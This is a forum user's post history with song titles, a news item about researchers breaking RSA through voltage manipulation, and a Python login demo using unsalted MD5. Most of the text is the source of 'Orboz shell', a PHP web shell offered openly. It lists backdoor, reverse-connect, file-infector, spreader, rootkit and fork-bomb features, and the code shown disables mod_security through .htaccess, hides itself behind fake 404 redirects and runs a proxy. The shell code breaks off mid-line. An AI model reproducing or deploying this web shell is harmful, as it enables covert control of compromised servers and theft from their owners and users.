Everything posted by Gonzalez
-
Ini Kamoze - World-A-Music.mp3 -Gonzalez
-
Anyway, Parazitii are in first place and have always been above the "mafia" -Gonzalez
-
The most secure encryption method has been cracked!
Gonzalez replied to Gonzalez's topic in Security News
I just found it now. -Gonzalez
-
Three Comrades - Erich Maria Remarque -Gonzalez
-
1024-bit RSA encryption, considered the most secure method of its kind in the world, has been cracked, engadget.com reports.

Since it was discovered in 1977, the 1024-bit RSA encryption algorithm has been considered the most secure method of protecting data, whether in computer software, gadgets or data transmissions, and it was estimated that it could be broken only by brute force, but over a period of time discouraging to anyone who might try: 1500 years.

Three researchers from the University of Michigan say they managed to "fool" the famous algorithm with a "simple" method: they varied the processor's supply voltage in a controlled way to generate a single error per clock cycle, which allowed them to read successive one-bit changes of the private key, and thus to find the password.

Don't try this at home, though: besides the computer used for the encryption, they also needed, for processing and interpreting the data, a cluster of 81 Pentium 4 computers and 104 hours of work.

The researchers will present the results of their study at the "Design, Automation and Test" conference, which takes place this week, and recommend that, until RSA fixes the problem, you pay close attention to your power supply!
-
Parazitii - Bem.mp3 -Gonzalez
-
800. -Gonzalez
-
#!/usr/bin/env python3
# Author: s3my0n
# Base Idea: 1R3N1CU5
# Comment: If you feed invalid type of database, the program will break ^^ be nice

import sys
from hashlib import md5


class UserManagement(object):
    def __init__(self, pathtodb):
        self.pathtodb = pathtodb

    def readDatabase(self):
        try:
            self.fopen = open(self.pathtodb, 'r+')  # tries to open path
        except IOError:
            print('\n [-] Could not open %s to read/write' % (self.pathtodb))
            sys.exit()
        pares = [i.strip() for i in self.fopen.readlines()]  # stripping '\n' newline
        db = {}
        for i in pares:
            pare = i.split(':')  # this returns [user, pass] out of 'user:pass'
            db[pare[0]] = pare[1]
        self.database = db

    def encryptPassword(self, text):  # My nifty md5 hash maker
        # Unsalted MD5 is a learning exercise here; it is not suitable
        # for storing real passwords.
        m = md5()
        m.update(text.encode('utf-8'))  # md5 works on bytes
        en_text = m.hexdigest()
        return en_text

    def userLogin(self, user, password):
        if user in self.database:
            # encrypting password to md5 hash and comparing it to the database's hash
            if self.database[user] == self.encryptPassword(password):
                print('\n [+] Access Granted!')
            else:
                print('\n [-] Invalid password for %s' % (user))
        else:
            print('\n [-] Invalid username')

    def userRegister(self, user, password):
        if user in self.database:
            print('\n [-] User already exists')
            return
        towrite = '%s:%s\n' % (user, self.encryptPassword(password))
        self.fopen.write(towrite)  # writing 'user:pass' to database
        self.fopen.flush()  # make the new entry visible when the file is re-read


def about():
    a = '''
    #########################
    #                       #
    #    Author: s3my0n     #
    #    Idea: 1R3N1CU5     #
    #                       #
    # For Intern0t.net !!!  #
    #                       #
    # Experiment and Learn  #
    #                       #
    #########################
    '''
    return a


def rules():
    r = '''
    1: Register new user
    2: Login with existing user
    3: Exit the program
    '''
    return r


def register():
    try:
        u = input('\n Enter new username: ')
        p = input('\n Enter new password: ')
    except (KeyboardInterrupt, IOError):
        print('\n [*] Going back to main menu')
        return
    mng.userRegister(u, p)  # adding new user
    mng.readDatabase()  # updates database


def login():
    try:
        u = input('\n Username: ')
        p = input('\n Password: ')
    except (KeyboardInterrupt, IOError):
        print('\n [*] Going back to main menu')
        return
    mng.userLogin(u, p)


def main():
    print(rules())
    while True:
        try:
            command = input('\nWhat would you like to do?: ').strip()
        except (IOError, KeyboardInterrupt):
            print('\n [*] See ya later aligator')
            sys.exit()
        if command in ('1', '2', '3'):  # exact match; '' or '12' are rejected
            if command == '1':
                register()
            if command == '2':
                login()
            if command == '3':
                print('\n [*] BYe..')
                sys.exit()
        else:
            print('\n [-] Invalid command')


if __name__ == '__main__':
    while True:
        try:
            path = input('\nPlease specify path to user database: ')
        except (KeyboardInterrupt, IOError):
            print('\n [*] Aborted')
            sys.exit()
        break
    # module-level name, so all functions can access the UserManagement instance
    mng = UserManagement(path)  # on this assignment __init__ gets path as pathtodb
    mng.readDatabase()  # reads database
    print(about())
    main()  # starting main function
-
Videos from the PyCon 2010 conference http://pycon.blip.tv/
-
<?php /* * Orboz shell .. R57 On steroids * Build: 4 * List of must-makes: * - TODO: More database support; -999% * - TODO: Spoofer Shit; not started * - TODO: Proxy POST Shit * - TODO: Rootkit shit * - TODO: New spread method * - TODO: Import WHMCS Tools; 10% * - TODO: Import vBulluten Tools * - TODO: Import phpBB Tools * - TODO: Search Tool * - TODO: locator * - TODO: Plugins * * Features: * - Shell Killer * - Server quick-info bar: * > Server IP * > Your IP * > Disk space * > Safe_mode Status * > Open_BaseDir Status * > Magic_Quotes Status * > Register globals Status * > System Type * > Server software * > Disabled functions * > ID * > Shell location * > PHP Version * > Check Remote includes * > Read /etc/passwd? * > MySQL Status * > cURL Status * > Check for Root * > /tmp writable? * > getcwd() writable? * - File listing with CHMOD, Rename, Move, Delete functions * - File Infector (Mini-Shell in PHP file) * - Bypassers: cURL, copy(), Perl, ioncube * - Bypassers for Windows: Com wscript.shell, Ffi WinExec * - Locator * - Port Scanner * - Search Files * - Rootkit Tools * - Spreader * - Fork Bomb that launches several methods * - PHP Eval * - Run Shell Script * - Crypt data with: MD5, SHA1, Crypt, CRC32, CRC16, Base64 Encode, Base64 decode, URL encode, URL decode, Bin2Hex, Hex2Bin, Dec2Hex, Hex2Dec, Blowfish, Standard DES, Extended DES, Apr1 md5, Shadow MD5 * - Database Functions: * > MySQL: * * Connect to server * * Manage a database * * Run Queries * * View important information; Table Count, etc * * Dump/Export Table and Database * * Create Tables * * List Proccess * - Backdoor functions: Perl Backdoor, Connect to, Rev3rse Krew BC; with automatic perl location setting * - Server Info; Processor Information, CPU Info, Memory Information * - PhpInfo; With in-the-making bypasser (for blocked phpinfo) * - Built-In Proxy * - Plugins that will allow to add other functions [incom] * * */ /* Defaults.. 
*/ session_start(); @set_magic_quotes_runtime(false); /***********************************\ * Settings * \***********************************/ /* * ENABLE_PLUGINS * Change to true if you want to enabled plugins */ define("ENABLE_PLUGINS", true); /* * DEBUG_MODE * Change to true if you want to show errors */ define("DEBUG_MODE", false); /* * ignor0rzz * Ignore all false statments in checkups.. enabled normaly */ define("ignor0rzz", true); /* * ACCESS_TYPE * 0 = Regular Access * 1 = I.P. restricted (md5 format) * 2 = Hostname format (md5 format) * 3 = Username/Password Required (md5 format) */ define("ACCESS_TYPE", 0); /* * ACCESS_STRING -> THESE ARE ALWAYS MD5'D * If.. * 0 = Regular Access :: Dosen't matter what it is * 1 = I.P. restricted (md5 format) :: md5 your I.P (use ?md5=_YOUR_IP_) * 2 = Hostname format (md5 format) :: md5 your hostname (use ?md5=_hostname) * 3 = Username/Password Required (md5 format) :: md5 both username and password, put in format username:password (use ?md5a=_USERNAME_&md5b=_PASSWORD_) */ define("ACCESS_STRING", "14c4b06b824ec593239362517f538b29:5f4dcc3b5aa765d61d8327deb882cf99"); /* * END settings DO NOT edit anything else! */ define("V", 4); if(version_compare(phpversion(), "4.1.0") == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } switch(ACCESS_TYPE) { case 3: if (!isset($_SERVER['PHP_AUTH_USER']) || (md5($_SERVER['PHP_AUTH_USER']) . ":" . md5($_SERVER['PHP_AUTH_PW']))!= ACCESS_STRING) { header('WWW-Authenticate: Basic realm="Passworded Area"'); header('HTTP/1.0 401 Unauthorized'); exit("<h1>401 Unauthorized</h1><p>Your login details are incorrect!</p>"); } break; case 2: /* Send them back a few dirs if there data is wrong.. 
this can confuse the user and make them lose where the shell is */ if(md5(gethostbyaddr($_SERVER['REMOTE_ADDR'])) != ACCESS_STRING) { header("HTTP/1.0 404 Not Found"); header("Location: ../../../../../../../"); exit(); } break; case 1: if(md5($_SERVER['REMOTE_ADDR']) != ACCESS_STRING) { header("HTTP/1.0 404 Not Found"); header("Location: ../../../../../../../"); exit(); } case 0: default: break; } /* * Plugin System * To use the plugin system, simply link it to the r00t plugin * spot. * * E.G * $plugin[1] = "http://www.example.com/plugin.name"; * * DO NOT EDIT THE FIRST ONE! ($plugin[0] = 0;) SIMPLY ADD * THEM UNDER! * */ /* DEFAULT DO NOT CHANGE THIS */ $plugins[0] = 0; /* * Name: Shell Updater * Desc: This will check for updates on the shell, it will * add a box to the top of the page if needed. * * TODO: Get an update server */ //$plugins[1] = "http://www.todo.com/updater.txt"; /* Few bypassers */ if(function_exists("ini_alter")) { ini_alter("safe_mode", "off"); ini_alter("open_basedir", "off"); } @chmod("./.htaccess", 0777); if(file_exists("./.htaccess") || is_writable("./.htaccess")) { $current_htaccess = file_get_contents("./.htaccess"); $fh = fopen("./.htaccess", "w"); fwrite($fh, " <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>"); fclose($fh); } $pagestart = microtime(); $curl_on = function_exists('curl_version'); $mssql_on = function_exists('mssql_connect'); $pg_on = function_exists('pg_connect'); $ora_on = function_exists('ocilogon'); $disable_functions = ini_get("disable_functions"); if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } else { $ip = $_SERVER['REMOTE_ADDR']; } $int_paths = array("mybb", "phpbb", "phpbb2", "bb", "vb", "vboard", "phpbb3", "forum", "forums", "board", "boards", "bb", "discuss"); $config_files = array("config.php", "configuration.php", "settings", "mysql", "vb", "vboard", 
"phpbb3", "forum", "forums", "board", "boards", "bb", "discuss"); $billing_paths = array("whmcs", "cart", "shop", "billing", "", "payments", "bpay", "payway"); if($disable_functions == "") { $disable_functions = "None"; } if(is_dir("/home/") && is_writable("/home/")) { $home_readable = true; } else { $home_readable = false; } if(is_dir("/root/") && is_writable("/root/")) { $your_root = true; } else { /* * check windows */ if(is_dir("C:/Windows/") && is_writable("C:/Windows/")) { $your_root = true; } else { $your_root = false; } } if(is_dir("/tmp/") && is_writable("/tmp/")) { $tmp_readable = true; } else { $tmp_readable = false; } if(isset($_GET['md5'])) { echo("<h1>Quick MD5 Results</h1>"); if($_GET['md5'] == "_hostname") { echo("Hostname md5'd<br />" . md5(gethostbyaddr($_SERVER['REMOTE_ADDR']))); } else { echo(md5($_GET['md5'])); } exit(); } if(isset($_GET['md5a']) || isset($_GET['md5b'])) { echo("<h1>Quick MD5 Results</h1>"); echo(md5($_GET['md5a']) . ":" . md5($_GET['md5b'])); exit(); } _loadplugins(); if(isset($_GET['go']) && $_GET['go'] == "proxyx") { $_config = array ( 'url_var_name' => 'q', 'flags_var_name' => 'hl', 'get_form_name' => '____pgfa', 'basic_auth_var_name' => '____pbavn', 'max_file_size' => -1, 'allow_hotlinking' => 0, 'upon_hotlink' => 1, 'compress_output' => 0 ); $_flags = array ( 'include_form' => 1, 'remove_scripts' => 0, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 0, 'rotate13' => 1, 'base64_encode' => 1, 'strip_meta' => 1, 'strip_title' => 0, 'session_cookies' => 1 ); $_frozen_flags = array ( 'include_form' => 0, 'remove_scripts' => 0, 'accept_cookies' => 0, 'show_images' => 0, 'show_referer' => 0, 'rotate13' => 0, 'base64_encode' => 0, 'strip_meta' => 0, 'strip_title' => 0, 'session_cookies' => 0 ); $_labels = array ( 'include_form' => array('Include Form', 'Include mini URL-form on every page'), 'remove_scripts' => array('Remove Scripts', 'Remove client-side scripting (i.e JavaScript)'), 'accept_cookies' => array('Accept 
Cookies', 'Allow cookies to be stored'), 'show_images' => array('Show Images', 'Show images on browsed pages'), 'show_referer' => array('Show Referer', 'Show actual referring Website'), 'rotate13' => array('Rotate13', 'Use ROT13 encoding on the address'), 'base64_encode' => array('Base64', 'Use base64 encodng on the address'), 'strip_meta' => array('Strip Meta', 'Strip meta information tags from pages'), 'strip_title' => array('Strip Title', 'Strip page title'), 'session_cookies' => array('Session Cookies', 'Store cookies for this session only') ); $_hosts = array ( '#^127\.|192\.168\.|10\.|172\.(1[6-9]|2[0-9]|3[01])\.|67.43.227.231|rev3rse.org|www.rev3rse.org#i' ); $_hotlink_domains = array(); $_insert = array(); $_iflags = ''; $_system = array ( 'ssl' => extension_loaded('openssl') && version_compare(PHP_VERSION, '4.3.0', '>='), 'uploads' => ini_get('file_uploads'), 'gzip' => extension_loaded('zlib') && !ini_get('zlib.output_compression'), 'stripslashes' => get_magic_quotes_gpc() ); $_proxify = array('text/html' => 1, 'application/xml+xhtml' => 1, 'application/xhtml+xml' => 1, 'text/css' => 1); $_version = '0.5b2'; $_http_host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost'); $_script_url = 'http' . ((isset($_ENV['HTTPS']) && $_ENV['HTTPS'] == 'on') || $_SERVER['SERVER_PORT'] == 443 ? 's' : '') . '://' . $_http_host . ($_SERVER['SERVER_PORT'] != 80 && $_SERVER['SERVER_PORT'] != 443 ? ':' . $_SERVER['SERVER_PORT'] : '') . 
$_SERVER['PHP_SELF']; $_script_base = substr($_script_url, 0, strrpos($_script_url, '/')+1); $_url = ''; $_url_parts = array(); $_base = array(); $_socket = null; $_request_method = $_SERVER['REQUEST_METHOD']; $_request_headers = ''; $_cookie = ''; $_post_body = ''; $_response_headers = array(); $_response_keys = array(); $_http_version = ''; $_response_code = 0; $_content_type = 'text/html'; $_content_length = false; $_content_disp = ''; $_set_cookie = array(); $_retry = false; $_quit = false; $_basic_auth_header = ''; $_basic_auth_realm = ''; $_auth_creds = array(); $_response_body = ''; function show_report($data) { echo '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <head> <style type="text/css"> body, input { font-family: "Bitstream Vera Sans", Arial, Helvetica, sans-serif; color: #234; } a { color: #9B9C83; text-decoration:none; border-bottom: 0px; } a:hover { color: #0080FF; } #container { border: 0px; -moz-border-radius: 0px; margin: auto; padding: 0px; width: 700px; } #title { color: #CC6633; margin: 0; } ul#navigation, ul#form { list-style-type: none; padding: 0; margin: 0; } ul#navigation { float: right; } ul#form { clear: both; } ul#navigation li { float: left; margin: 0; padding: 5px 0; border-top: 2px #BFAA9B solid; } ul#navigation li a { font-weight: bold; color: #ffffff; background-color: #AA8E79; padding: 5px 15px; margin-left: 1px; text-decoration: none; border-bottom: 0 #ffffff solid; } ul#navigation li a:hover { color: #44352C; } ul#form li { width: 700px; } #footer { color: #9B9C83; font-size: small; text-align: right; } #address_bar { border-top: 2px #BFAA9B solid; border-bottom: 3px #44352C solid; background-color: #AA8E79; text-align: center; padding: 5px 0; color: #ffffff; } #go { background-color: #ffffff; font-weight: bold; color: #AA8E79; border: 0 
#ffffff solid; padding: 2px 5px; } #address_box { width: 500px; } .option { padding: 2px 0; background-color: #EEEBEA; } .option label { border-bottom: 2px #ffffff solid; } form { margin: 0; } #error, #auth { background-color: #BF6464; border-top: 1px solid #44352C; border-bottom: 1px solid #44352C; width: 700px; clear: both; } #auth { background-color: #94C261; } #error p, #auth p, #auth form { margin: 5px; } </style> </head> <body onload="document.getElementById(\'address_box\').focus()"> <div id="container"> <h1><font color="white">r00t-access Shell Proxy</font></h1>'; switch ($data['category']) { case 'auth': echo '<div id="auth"><p> <b>Enter your username and password for "' . htmlspecialchars($data['realm']) . '" on ' . $GLOBALS['_url_parts']['host'] . '</b> <form method="post" action="?go=proxyx"> <input type="hidden" name="' . $GLOBALS['_config']['basic_auth_var_name'] . ' " value="' . base64_encode($data['realm']) . '" /> <label>Username <input type="text" name="username" value="" /></label> <label>Password <input type="password" name="password" value="" /></label> <input type="submit" value="Login" /> </form></p></div>'; break; case 'error': echo '<div id="error"><p>'; switch ($data['group']) { case 'url': echo '<b>URL Error (' . $data['error'] . ')</b>: '; switch ($data['type']) { case 'internal': $message = 'Failed to connect to the specified host. ' . 'Possible problems are that the server was not found, the connection timed out, or the connection refused by the host. ' . 'Try connecting again and check if the address is correct.'; break; case 'external': switch ($data['error']) { case 1: $message = 'The URL you\'re attempting to access is blacklisted by this server. Please select another URL.'; break; case 2: $message = 'The URL you entered is malformed. 
Please check whether you entered the correct URL or not.'; break; } break; } break; case 'resource': echo '<b>Resource Error:</b> '; switch ($data['type']) { case 'file_size': $message = 'The file your are attempting to download is too large.<br />' . 'Maxiumum permissible file size is <b>' . number_format($GLOBALS['_config']['max_file_size']/1048576, 2) . ' MB</b><br />' . 'Requested file size is <b>' . number_format($GLOBALS['_content_length']/1048576, 2) . ' MB</b>'; break; case 'hotlinking': $message = 'It appears that you are trying to access a resource through this proxy from a remote Website.<br />' . 'For security reasons, please use the form below to do so.'; break; } break; } echo 'An error has occured while trying to browse through the proxy. <br />' . $message . '</p></div>'; break; } ?> <form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>?go=proxyx"> <ul id="form"> <li id="address_bar"><label>Web Address <input id="address_box" type="text" name="<?php echo $GLOBALS['_config']['url_var_name'] ?>" value="<?php echo isset($GLOBALS['_url']) ? htmlspecialchars($GLOBALS['_url']) : '' ?>" onfocus="this.select()" /></label> <input id="go" type="submit" value="Go" /></li> <?php foreach ($GLOBALS['_flags'] as $flag_name => $flag_value) { if (!$GLOBALS['_frozen_flags'][$flag_name]) { echo '<li class="option"><label><input type="checkbox" name="' . $GLOBALS['_config']['flags_var_name'] . '[' . $flag_name . ']"' . ($flag_value ? ' checked="checked"' : '') . ' />' . $GLOBALS['_labels'][$flag_name][1] . '</label></li>' . "\n"; } } ?> </ul> </form> </div> </body> </html> <?php exit(0); } function add_cookie($name, $value, $expires = 0) { return rawurlencode(rawurlencode($name)) . '=' . rawurlencode(rawurlencode($value)) . (empty($expires) ? '' : '; expires=' . gmdate('D, d-M-Y H:i:s \G\M\T', $expires)) . '; path=/; domain=.' . 
$GLOBALS['_http_host']; } function set_post_vars($array, $parent_key = null) { $temp = array(); foreach ($array as $key => $value) { $key = isset($parent_key) ? sprintf('%s[%s]', $parent_key, urlencode($key)) : urlencode($key); if (is_array($value)) { $temp = array_merge($temp, set_post_vars($value, $key)); } else { $temp[$key] = urlencode($value); } } return $temp; } function set_post_files($array, $parent_key = null) { $temp = array(); foreach ($array as $key => $value) { $key = isset($parent_key) ? sprintf('%s[%s]', $parent_key, urlencode($key)) : urlencode($key); if (is_array($value)) { $temp = array_merge_recursive($temp, set_post_files($value, $key)); } else if (preg_match('#^([^\[\]]+)\[(name|type|tmp_name)\]#', $key, $m)) { $temp[str_replace($m[0], $m[1], $key)][$m[2]] = $value; } } return $temp; } function url_parse($url, & $container) { $temp = @parse_url($url); if (!empty($temp)) { $temp['port_ext'] = ''; $temp['base'] = $temp['scheme'] . '://' . $temp['host']; if (isset($temp['port'])) { $temp['base'] .= $temp['port_ext'] = ':' . $temp['port']; } else { $temp['port'] = $temp['scheme'] === 'https' ? 443 : 80; } $temp['path'] = isset($temp['path']) ? $temp['path'] : '/'; $path = array(); $temp['path'] = explode('/', $temp['path']); foreach ($temp['path'] as $dir) { if ($dir === '..') { array_pop($path); } else if ($dir !== '.') { for ($dir = rawurldecode($dir), $new_dir = '', $i = 0, $count_i = strlen($dir); $i < $count_i; $new_dir .= strspn($dir{$i}, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$-_.+!*\'(),?:@&;=') ? $dir{$i} : rawurlencode($dir{$i}), ++$i); $path[] = $new_dir; } } $temp['path'] = str_replace('/%7E', '/~', '/' . ltrim(implode('/', $path), '/')); $temp['file'] = substr($temp['path'], strrpos($temp['path'], '/')+1); $temp['dir'] = substr($temp['path'], 0, strrpos($temp['path'], '/')); $temp['base'] .= $temp['dir']; $temp['prev_dir'] = substr_count($temp['path'], '/') > 1 ? 
substr($temp['base'], 0, strrpos($temp['base'], '/')+1) : $temp['base'] . '/'; $container = $temp; return true; } return false; } function complete_url($url, $proxify = true) { $url = trim($url); if ($url === '') { return ''; } $hash_pos = strrpos($url, '#'); $fragment = $hash_pos !== false ? '#' . substr($url, $hash_pos) : ''; $sep_pos = strpos($url, '://'); if ($sep_pos === false || $sep_pos > 5) { switch ($url{0}) { case '/': $url = substr($url, 0, 2) === '//' ? $GLOBALS['_base']['scheme'] . ':' . $url : $GLOBALS['_base']['scheme'] . '://' . $GLOBALS['_base']['host'] . $GLOBALS['_base']['port_ext'] . $url; break; case '?': $url = $GLOBALS['_base']['base'] . '/' . $GLOBALS['_base']['file'] . $url; break; case '#': $proxify = false; break; case 'm': if (substr($url, 0, 7) == 'mailto:') { $proxify = false; break; } default: $url = $GLOBALS['_base']['base'] . '/' . $url; } } return $proxify ? "{$GLOBALS['_script_url']}?{$GLOBALS['_config']['url_var_name']}=" . encode_url($url) . $fragment . "&go=proxyx" : $url . "&go=proxyx"; } function proxify_inline_css($css) { preg_match_all('#url\s*\(\s*(([^)]*(\\\))*[^)]*)(\)|$)?#i', $css, $matches, PREG_SET_ORDER); for ($i = 0, $count = count($matches); $i < $count; ++$i) { $css = str_replace($matches[$i][0], 'url(' . proxify_css_url($matches[$i][1]) . "&go=proxyx" . ')', $css); } return $css; } function proxify_css($css) { $css = proxify_inline_css($css); preg_match_all("#@import\s*(?:\"([^\">]*)\"?|'([^'>]*)'?)([^;]*)(;|$)#i", $css, $matches, PREG_SET_ORDER); for ($i = 0, $count = count($matches); $i < $count; ++$i) { $delim = '"'; $url = $matches[$i][2]; if (isset($matches[$i][3])) { $delim = "'"; $url = $matches[$i][3]; } $css = str_replace($matches[$i][0], '@import ' . $delim . proxify_css_url($matches[$i][1]) . $delim . (isset($matches[$i][4]) ? $matches[$i][4] : ''), $css); } return $css; } function proxify_css_url($url) { $url = trim($url); $delim = strpos($url, '"') === 0 ? '"' : (strpos($url, "'") === 0 ? 
"'" : ''); return $delim . preg_replace('#([\(\),\s\'"\\\])#', '\\$1', complete_url(trim(preg_replace('#\\\(.)#', '$1', trim($url, $delim))))) . $delim; } if (isset($_POST[$_config['url_var_name']]) && !isset($_GET[$_config['url_var_name']]) && isset($_POST[$_config['flags_var_name']])) { foreach ($_flags as $flag_name => $flag_value) { $_iflags .= isset($_POST[$_config['flags_var_name']][$flag_name]) ? (string)(int)(bool)$_POST[$_config['flags_var_name']][$flag_name] : ($_frozen_flags[$flag_name] ? $flag_value : '0'); } $_iflags = base_convert(($_iflags != '' ? $_iflags : '0'), 2, 16); } else if (isset($_GET[$_config['flags_var_name']]) && !isset($_GET[$_config['get_form_name']]) && ctype_alnum($_GET[$_config['flags_var_name']])) { $_iflags = $_GET[$_config['flags_var_name']]; } else if (isset($_COOKIE['flags']) && ctype_alnum($_COOKIE['flags'])) { $_iflags = $_COOKIE['flags']; } if ($_iflags !== '') { $_set_cookie[] = add_cookie('flags', $_iflags, time()+2419200); $_iflags = str_pad(base_convert($_iflags, 16, 2), count($_flags), '0', STR_PAD_LEFT); $i = 0; foreach ($_flags as $flag_name => $flag_value) { $_flags[$flag_name] = $_frozen_flags[$flag_name] ? 
$flag_value : (int)(bool)$_iflags{$i}; $i++; } } if ($_flags['rotate13']) { function encode_url($url) { return rawurlencode(str_rot13($url)); } function decode_url($url) { return str_replace(array('&', '&'), '&', str_rot13(rawurldecode($url))); } } else if ($_flags['base64_encode']) { /* *Stop annoying errors in zend */ eval(" function encode_url(\$url) { return rawurlencode(base64_encode(\$url)); } function decode_url(\$url) { return str_replace(array('&', '&'), '&', base64_decode(rawurldecode(\$url))); }"); } else { eval(" function encode_url(\$url) { return rawurlencode(\$url); } function decode_url(\$url) { return str_replace(array('&', '&'), '&', rawurldecode(\$url)); }"); } if ($_config['compress_output'] && $_system['gzip']) { ob_start('ob_gzhandler'); } if ($_system['stripslashes']) { function _stripslashes($value) { return is_array($value) ? array_map('_stripslashes', $value) : (is_string($value) ? stripslashes($value) : $value); } $_GET = _stripslashes($_GET); $_POST = _stripslashes($_POST); $_COOKIE = _stripslashes($_COOKIE); } if (isset($_POST[$_config['url_var_name']]) && !isset($_GET[$_config['url_var_name']])) { header('Location: ' . $_script_url . '?' . $_config['url_var_name'] . '=' . encode_url($_POST[$_config['url_var_name']]) . '&' . $_config['flags_var_name'] . '=' . base_convert($_iflags, 2, 16) . "&go=proxyx"); exit(0); } if (isset($_GET[$_config['get_form_name']])) { $_url = decode_url($_GET[$_config['get_form_name']]); $qstr = strpos($_url, '?') !== false ? (strpos($_url, '?') === strlen($_url)-1 ? '' : '&') : '?'; $arr = explode('&', $_SERVER['QUERY_STRING']); if (preg_match('#^\Q' . $_config['get_form_name'] . '\E#', $arr[0])) { array_shift($arr); } $_url .= $qstr . 
implode('&', $arr); } else if (isset($_GET[$_config['url_var_name']])) { $_url = decode_url($_GET[$_config['url_var_name']]); } else if (isset($_GET['action']) && $_GET['action'] == 'cookies') { show_report(array('which' => 'cookies')); } else { show_report(array('which' => 'index', 'category' => 'entry_form')); } if (isset($_GET[$_config['url_var_name']], $_POST[$_config['basic_auth_var_name']], $_POST['username'], $_POST['password'])) { $_request_method = 'GET'; $_basic_auth_realm = base64_decode($_POST[$_config['basic_auth_var_name']]); $_basic_auth_header = base64_encode($_POST['username'] . ':' . $_POST['password']); } if (strpos($_url, '://') === false) { $_url = 'http://' . $_url; } if (url_parse($_url, $_url_parts)) { $_base = $_url_parts; if (!empty($_hosts)) { foreach ($_hosts as $host) { if (preg_match($host, $_url_parts['host'])) { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'external', 'error' => 1)); } } } } else { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'external', 'error' => 2)); } if (!$_config['allow_hotlinking'] && isset($_SERVER['HTTP_REFERER'])) { $_hotlink_domains[] = $_http_host; $is_hotlinking = true; foreach ($_hotlink_domains as $host) { if (preg_match('#^https?\:\/\/(www)?\Q' . $host . '\E(\/|\$)#i', trim($_SERVER['HTTP_REFERER']))) { $is_hotlinking = false; break; } } if ($is_hotlinking) { switch ($_config['upon_hotlink']) { case 1: show_report(array('which' => 'index', 'category' => 'error', 'group' => 'resource', 'type' => 'hotlinking')); break; case 2: header('HTTP/1.0 404 Not Found'); exit(0); default: header('Location: ' . $_config['upon_hotlink'] . "?go=proxyx"); exit(0); } } } do { $_retry = false; $_socket = @fsockopen(($_url_parts['scheme'] === 'https' && $_system['ssl'] ? 'ssl://' : 'tcp://') . 
$_url_parts['host'], $_url_parts['port'], $err_no, $err_str, 30); if ($_socket === false) { show_report(array('which' => 'index', 'category' => 'error', 'group' => 'url', 'type' => 'internal', 'error' => $err_no)); } $_request_headers = $_request_method . ' ' . $_url_parts['path']; if (isset($_url_parts['query'])) { $_request_headers .= '?'; $query = preg_split('#([&;])#', $_url_parts['query'], -1, PREG_SPLIT_DELIM_CAPTURE); for ($i = 0, $count = count($query); $i < $count; $_request_headers .= implode('=', array_map('urlencode', array_map('urldecode', explode('=', $query[$i])))) . (isset($query[++$i]) ? $query[$i] : ''), $i++); } $_request_headers .= " HTTP/1.0\r\n"; $_request_headers .= 'Host: ' . $_url_parts['host'] . $_url_parts['port_ext'] . "\r\n"; if (isset($_SERVER['HTTP_USER_AGENT'])) { $_request_headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n"; } if (isset($_SERVER['HTTP_ACCEPT'])) { $_request_headers .= 'Accept: ' . $_SERVER['HTTP_ACCEPT'] . "\r\n"; } else { $_request_headers .= "Accept: */*;q=0.1\r\n"; } if ($_flags['show_referer'] && isset($_SERVER['HTTP_REFERER']) && preg_match('#^\Q' . $_script_url . '?' . $_config['url_var_name'] . '=\E([^&]+)#', $_SERVER['HTTP_REFERER'], $matches)) { $_request_headers .= 'Referer: ' . decode_url($matches[1]) . "\r\n"; } if (!empty($_COOKIE)) { $_cookie = ''; $_auth_creds = array(); foreach ($_COOKIE as $cookie_id => $cookie_content) { $cookie_id = explode(';', @rawurldecode($cookie_id)); $cookie_content = explode(';', @rawurldecode($cookie_content)); if ($cookie_id[0] === 'COOKIE') { $cookie_id[3] = str_replace('_', '.', $cookie_id[3]); if (count($cookie_id) < 4 || ($cookie_content[1] == 'secure' && $_url_parts['scheme'] != 'https')) { continue; } if ((preg_match('#\Q' . $cookie_id[3] . '\E$#i', $_url_parts['host']) || strtolower($cookie_id[3]) == strtolower('.' . $_url_parts['host'])) && preg_match('#^\Q' . $cookie_id[2] . '\E#', $_url_parts['path'])) { $_cookie .= ($_cookie != '' ? '; ' : '') . 
(empty($cookie_id[1]) ? '' : $cookie_id[1] . '=') . $cookie_content[0]; } } else if ($cookie_id[0] === 'AUTH' && count($cookie_id) === 3) { $cookie_id[2] = str_replace('_', '.', $cookie_id[2]); if ($_url_parts['host'] . ':' . $_url_parts['port'] === $cookie_id[2]) { $_auth_creds[$cookie_id[1]] = $cookie_content[0]; } } } if ($_cookie != '') { $_request_headers .= "Cookie: $_cookie\r\n"; } } if (isset($_url_parts['user'], $_url_parts['pass'])) { $_basic_auth_header = base64_encode($_url_parts['user'] . ':' . $_url_parts['pass']); } if (!empty($_basic_auth_header)) { $_set_cookie[] = add_cookie("AUTH;{$_basic_auth_realm};{$_url_parts['host']}:{$_url_parts['port']}", $_basic_auth_header); $_request_headers .= "Authorization: Basic {$_basic_auth_header}\r\n"; } else if (!empty($_basic_auth_realm) && isset($_auth_creds[$_basic_auth_realm])) { $_request_headers .= "Authorization: Basic {$_auth_creds[$_basic_auth_realm]}\r\n"; } else if (list($_basic_auth_realm, $_basic_auth_header) = each($_auth_creds)) { $_request_headers .= "Authorization: Basic {$_basic_auth_header}\r\n"; } if ($_request_method == 'POST') { if (!empty($_FILES) && 